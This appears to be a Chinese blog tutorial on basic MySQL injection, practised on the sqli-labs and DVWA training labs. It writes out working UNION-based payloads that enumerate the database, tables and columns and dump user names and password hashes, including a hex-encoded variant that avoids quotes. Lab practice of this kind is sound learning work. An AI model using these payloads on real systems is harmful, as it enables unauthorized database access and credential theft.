首页
所有分类
TAGS
文字工具 EMOJI BIBLE
数据库 MySQL

MySQL注入基础练习

Posted in MySQL onMay 30, 2021

以sqli-labs-master作为练习

初始:简单获取基础内容

第一步,使用拼接的方式决定注入类型

MySQL注入基础练习

第二部,使用order by确定有表单有几列值

order by根据指定的列对结果集进行排序

MySQL注入基础练习

第三步,使用union select 来找到内容,获取想要得到内容

union select :联合查询

MySQL注入基础练习

进阶,通过mysql注入获取表单内容,托库;

第一步:通过数据库语句进行搜索,首先确定数据库

MySQL注入基础练习

第二部:确定数据库后,爆出它的表;

MySQL注入基础练习

第三步:确定表以后,可根据实际需求爆表,这里以users举例,进行爆字段

MySQL注入基础练习

第四部:确定字段后,我们就可以拖库;

MySQL注入基础练习

DVWA训练基础 low级别

1.参照上文确定当前库

1' union select (select database()),2 -- -

MySQL注入基础练习

2.确定库后,爆表

1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),2 -- -

MySQL注入基础练习

3.确定表后,爆字段

1' union select (select group_concat(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name='users'),2 -- -

MySQL注入基础练习

4.确定字段后,进行拖库

1' union select (select group_concat(concat_ws(0x7e,user,password))from users),2 -- -

MySQL注入基础练习

级别Medium

与low级别不同,没有输入框,只有选择项,所以需要借助bp工具

MySQL注入基础练习

1.打开代理使用bp进行抓包并发送到Repeater模块进行反复验证

MySQL注入基础练习

2.其余步骤参考上文:暴库

MySQL注入基础练习

爆表

ps:因为后台强制转译的问题,要注意避免单引号

MySQL注入基础练习

爆字段

同爆表,因为转译的问题,要注意避免引号,可使用编译规避;

1 union  select 1,(select group_concat(column_name) from information_schema.columns where table_schema = (select database()) and table_name=0x7573657273)

MySQL注入基础练习

拖库

MySQL注入基础练习

MySQL注入基础练习

- Author -

纪迁辰

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

MySQL 相关文章推荐
浅谈Mysql多表连接查询的执行细节
Apr 24 MySQL
MySQL时间设置注意事项的深入总结
May 06 MySQL
MySQL数字类型自增的坑
May 07 MySQL
关于MySQL中的 like操作符详情
Nov 17 MySQL
MySQL数据库索引的最左匹配原则
Nov 20 MySQL
解决Mysql多行子查询的使用及空值问题
Jan 22 MySQL
MySQL事务操作的四大特性以及并发事务问题
Apr 12 MySQL
mysql 获取相邻数据项
May 11 MySQL
MySQL如何修改字段类型和字段长度
Jun 10 MySQL
MySQL详解进行JDBC编程与增删改查方法
Jun 16 MySQL
MySQL详细讲解变量variables的用法
Jun 21 MySQL
MySQL transaction事务安全示例讲解
Jun 21 MySQL
解决Navicat for MySQL 连接 MySQL 报2005错误的问题
MYSQL(电话号码,身份证)数据脱敏的实现
May 28 #MySQL
MySql开发之自动同步表结构
mysql升级到5.7时,wordpress导数据报错1067的问题
May 27 #MySQL
解决Navicat for Mysql连接报错1251的问题(连接失败)
Navicat for MySQL的使用教程详解
MySQL Router实现MySQL的读写分离的方法
扫雷(1) 路由(1) Scheduled(1) 驱动模型(1) 抽象类(1) 乱码(3) 接口(1) 单向链表(1) router(1) Date(1)
You might like
我的论坛源代码(七)
2006/10/09 PHP
php部分常见问题总结
2008/03/27 PHP
简要剖析PHP的Yii框架的组件化机制的基本知识
2016/03/17 PHP
PHP常见的6个错误提示及解决方法
2016/07/07 PHP
yii2 上传图片的示例代码
2018/11/02 PHP
JavaScript 新手24条实用建议[TUTS+]
2009/06/21 Javascript
jquery.Ajax()方法调用Asp.Net后台的方法解析
2014/02/13 Javascript
Python脚本后台运行的几种方式
2015/03/09 Javascript
JavaScript判断undefined类型的正确方法
2015/06/30 Javascript
JavaScript中的继承之类继承
2016/05/01 Javascript
JavaScript数组的定义及数字操作技巧
2016/06/06 Javascript
JavaScript学习笔记整理_简单实现枚举类型,扑克牌应用
2016/09/19 Javascript
微信小程序中input标签详解及简单实例
2017/05/18 Javascript
Angularjs 实现动态添加控件功能
2017/05/25 Javascript
js学习总结_轮播图之渐隐渐现版(实例讲解)
2017/07/17 Javascript
vue+axios实现文件下载及vue中使用axios的实例
2018/09/21 Javascript
D3.js的基础部分之数组的处理数组的排序和求值(v3版本)
2019/05/09 Javascript
实用的Vue开发技巧
2019/05/30 Javascript
Nodejs使用archiver-zip-encrypted库加密压缩文件时报错(解决方案)
2019/11/18 NodeJs
[02:15]2015国际邀请赛选手档案IG.Ferrari 430
2015/07/30 DOTA
python中assert用法实例分析
2015/04/30 Python
Python如何生成树形图案
2018/01/03 Python
深入理解Python 关于supper 的 用法和原理
2018/02/28 Python
python监控进程脚本
2018/04/12 Python
浅谈Python中的全局锁(GIL)问题
2019/01/11 Python
Python实现合并两个有序链表的方法示例
2019/01/31 Python
python创建n行m列数组示例
2019/12/02 Python
使用Python matplotlib作图时,设置横纵坐标轴数值以百分比(%)显示
2020/05/16 Python
django 模型字段设置默认值代码
2020/07/15 Python
在Python3.74+PyCharm2020.1 x64中安装使用Kivy的详细教程
2020/08/07 Python
计划生育宣传标语
2014/06/21 职场文书
学雷锋志愿者活动总结
2014/06/27 职场文书
营销总监岗位职责
2014/09/16 职场文书
教育局党的群众路线教育实践活动整改方案
2014/09/20 职场文书
深入开展党的群众路线教育实践活动心得体会
2014/11/05 职场文书
详解Redis瘦身指南
2021/05/26 Redis